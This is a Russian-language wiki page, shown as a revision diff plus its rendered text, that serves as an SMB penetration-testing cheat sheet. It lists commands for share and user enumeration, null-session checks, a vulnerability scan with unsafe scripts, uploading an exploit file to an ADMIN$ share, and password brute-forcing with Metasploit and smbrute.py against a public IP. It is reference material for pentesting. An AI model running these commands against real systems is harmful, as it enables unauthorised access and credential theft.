Smb all — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) м |
Drakylar (обсуждение | вклад) м (→Атака) |
||
(не показано 15 промежуточных версий этого же участника) | |||
Строка 5: | Строка 5: | ||
==Разведка== | ==Разведка== | ||
− | === | + | ===Все вместе=== |
+ | ====enum4linux==== | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | enum4linux -a [-u USERNAME] [-w WORKGROUP] [-p PASSWORD] ip | ||
+ | </syntaxhighlight> | ||
+ | ====nullinux==== | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | nullinux [-u 'Domain\User'] [-w WORKGROUP] [-P password] ip | ||
+ | </syntaxhighlight> | ||
+ | ===Поиск сервисов=== | ||
− | ==== | + | ====nmap==== |
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | nmap _ips_ -p 139,445 -v --script=smb-enum* | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | ====nbtscan==== | ||
+ | Доменные имена, мак-адреса. | ||
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
− | + | nbtscan 192.168.1.0/24 | |
</syntaxhighlight> | </syntaxhighlight> | ||
+ | ===Сбор информации=== | ||
====nmblookup==== | ====nmblookup==== | ||
Входит в enum4linux | Входит в enum4linux | ||
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
nmblookup -A target | nmblookup -A target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====smb_version==== | ||
+ | Определяем версию | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version | ||
+ | msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.31.142 | ||
+ | RHOSTS => 192.168.31.142 | ||
+ | msf auxiliary(scanner/smb/smb_version) > run | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ===Поиск пользователей=== | ||
+ | |||
+ | ====smb_lookupsid==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | msf auxiliary(scanner/smb/smb_lookupsid) > use auxiliary/scanner/smb/smb_lookupsid | ||
+ | msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.31.142 | ||
+ | RHOSTS => 192.168.31.142 | ||
+ | msf auxiliary(scanner/smb/smb_lookupsid) > run | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====nmap==== | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254 | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====impacket-samrdump==== | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | python /usr/share/doc/python-impacket-doc/examples | ||
+ | /samrdump.py 192.168.XXX.XXX | ||
+ | |||
+ | impacket-samrdump 192.168.XXX.XXX | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ===Список сетевых хранилищ=== | ||
+ | |||
+ | ====smbmap==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | smbmap -H target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====smbclient==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | echo exit | smbclient -L \\\\target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====nmap==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | nmap --script smb-enum-shares -p 139,445 target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ==Тестирование== | ||
+ | |||
+ | ===Проверка на доступ с пустой сессией=== | ||
+ | |||
+ | ====smbmap==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | smbmap -H target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | ====rpcclient==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | rpcclient -U "" -N target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====smbclient==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | smbclient \\\\target\\share_name | ||
+ | |||
+ | smbclient -L //target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====Windows CMD==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | net use \\TARGET\IPC$ "" /u:"" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ===Поиск уязвимостей=== | ||
+ | |||
+ | ====nmap==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | nmap --script smb-vuln* -p 139,445 target --script-args=unsafe=1 | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | ===Перебор RID (юзеры)=== | ||
+ | |||
+ | ====ridenum==== | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | ridenum.py 192.168.XXX.XXX 500 50000 dict.txt | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====smb_lookupsid==== | ||
+ | use auxiliary/scanner/smb/smb_lookupsid | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | ===Работа с файлами=== | ||
+ | |||
+ | ====smbclient==== | ||
+ | Загрузка файла | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | smbclient //192.168.31.142/ADMIN$ -U "nobody"%"somepassword" -c "put 40280.py" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Примонтировать директорию | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | smbclient -L \\WIN7\ -I 192.168.13.218 | ||
+ | smbclient -L \\WIN7\ADMIN$ -I 192.168.13.218 | ||
+ | smbclient -L \\WIN7\C$ -I 192.168.13.218 | ||
+ | smbclient -L \\WIN7\IPC$ -I 192.168.13.218 | ||
+ | smbclient \\192.168.13.236\some-share -o user=root,pass=root,workgroup=BOB | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====mount==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | mount -t auto --source //192.168.31.147/kathy --target /tmp/smb/ -o username=root,workgroup=WORKGROUP | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====Windows CMD==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | net use X: \\<server>\<sharename> /USER:<domain>\<username> <password> /PERSISTENT:YES | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====smbspider==== | ||
+ | |||
+ | Утверждают что одна из лучших тулз для работы в виндовыми сетевыми хранилищами. | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | smbspider [-h] -ip IPADDRESS -s SHARE [-f SUBFOLDER] [-pa PATTERN] | ||
+ | [-pf PATTERNFILE] [-u USER] [-p PWD] [-d DOMAIN] | ||
+ | [-r RECURSIVE] [-t THREADS] | ||
</syntaxhighlight> | </syntaxhighlight> | ||
==Атака== | ==Атака== | ||
− | |||
− | === | + | ===Перебор паролей=== |
+ | |||
+ | ====smb_login==== | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | use auxiliary/scanner/smb/smb_login | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====smbrute.py==== | ||
+ | |||
+ | https://github.com/m4ll0k/SMBrute | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | python3 smbrute.py -h 2.35.69.44 -U user.txt -P pass.txt -t 10 | ||
+ | </syntaxhighlight> | ||
==Ссылки== | ==Ссылки== | ||
+ | |||
+ | [https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#smb-enumeration-tools cheatsheet pentest] |
Текущая версия на 13:58, 6 мая 2020
Содержание
Описание
Разведка
Все вместе
enum4linux
enum4linux -a [-u USERNAME] [-w WORKGROUP] [-p PASSWORD] ip
nullinux
nullinux [-u 'Domain\User'] [-w WORKGROUP] [-P password] ip
Поиск сервисов
nmap
nmap _ips_ -p 139,445 -v --script=smb-enum*
nbtscan
Доменные имена, мак-адреса.
nbtscan 192.168.1.0/24
Сбор информации
nmblookup
Входит в enum4linux
nmblookup -A target
smb_version
Определяем версию
msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_version) > run
Поиск пользователей
smb_lookupsid
msf auxiliary(scanner/smb/smb_lookupsid) > use auxiliary/scanner/smb/smb_lookupsid
msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_lookupsid) > run
nmap
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254
impacket-samrdump
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX
impacket-samrdump 192.168.XXX.XXX
Список сетевых хранилищ
smbmap
smbmap -H target
smbclient
echo exit | smbclient -L \\\\target
nmap
nmap --script smb-enum-shares -p 139,445 target
Тестирование
Проверка на доступ с пустой сессией
smbmap
smbmap -H target
rpcclient
rpcclient -U "" -N target
smbclient
smbclient \\\\target\\share_name
smbclient -L //target
Windows CMD
net use \\TARGET\IPC$ "" /u:""
Поиск уязвимостей
nmap
nmap --script smb-vuln* -p 139,445 target --script-args=unsafe=1
Перебор RID (юзеры)
ridenum
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
smb_lookupsid
use auxiliary/scanner/smb/smb_lookupsid </syntaxhighlight>
Работа с файлами
smbclient
Загрузка файла
smbclient //192.168.31.142/ADMIN$ -U "nobody"%"somepassword" -c "put 40280.py"
Примонтировать директорию
smbclient -L \\WIN7\ -I 192.168.13.218
smbclient -L \\WIN7\ADMIN$ -I 192.168.13.218
smbclient -L \\WIN7\C$ -I 192.168.13.218
smbclient -L \\WIN7\IPC$ -I 192.168.13.218
smbclient \\192.168.13.236\some-share -o user=root,pass=root,workgroup=BOB
mount
mount -t auto --source //192.168.31.147/kathy --target /tmp/smb/ -o username=root,workgroup=WORKGROUP
Windows CMD
net use X: \\<server>\<sharename> /USER:<domain>\<username> <password> /PERSISTENT:YES
smbspider
Утверждают что одна из лучших тулз для работы в виндовыми сетевыми хранилищами.
smbspider [-h] -ip IPADDRESS -s SHARE [-f SUBFOLDER] [-pa PATTERN]
[-pf PATTERNFILE] [-u USER] [-p PWD] [-d DOMAIN]
[-r RECURSIVE] [-t THREADS]
Атака
Перебор паролей
smb_login
use auxiliary/scanner/smb/smb_login
smbrute.py
https://github.com/m4ll0k/SMBrute
python3 smbrute.py -h 2.35.69.44 -U user.txt -P pass.txt -t 10